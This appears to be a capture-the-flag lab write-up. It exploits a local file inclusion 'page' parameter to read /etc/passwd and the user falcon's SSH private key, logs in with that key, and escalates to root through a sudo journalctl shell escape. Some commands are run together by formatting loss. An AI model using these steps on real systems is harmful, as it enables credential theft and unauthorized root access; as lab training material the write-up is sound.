[Task 2] Getting user access via LFI
- Look around the website. What is the name of the parameter you found on the website?
After exploring the site, I found “page” parameter.
2–3. Once we find the vulnerable parameter we can try to include the passwd file on the Linux system i.e /etc/passwd.
Check the bottom of the site. Here’s the result.
View page source, there’s 2 users: root and falcon.
4. What is the name of the user on the system?
ANS: It’s in #2–3.
5. Once you find the name of the user it’s important to see if you can include anything common and important in that user’s directory, could be anything like theirs .bashrc etc
6. Name of the file which can give you access to falcon’s account on the system?
I will tried to check if I can use log poisoning exploit first.
I will put this file request in the parameter.
/var/log/apache2/access.log
Failed!!!
Seems like I have to do the directory traversal instead.
Remember in Task#1 that there’s port 22 with SSH service. This “falcon” might has private key file in his directory.
The file will be “id_rsa” stored in “/home/falcon/.ssh”
Let’s find it.
Here’s the result
Copy it and save as “id_rsa”.
7. What is the user flag?
Change “id_rsa” permission first
chmod 600 id_rsa
Login to SSH
ssh -i id_rsa falcon@<ip>
lscat user.txt
[Task 3] Escalating your privileges to root
- What can falcon run as root?
sudo -lI can use “journalctl” to escalate my privilege.
2. Search gtfobins
3. What is the root flag?
sudo journalctl!/bin/shid
Now I’m root.
Let’s get root flag
cd /rootlscat root.txt
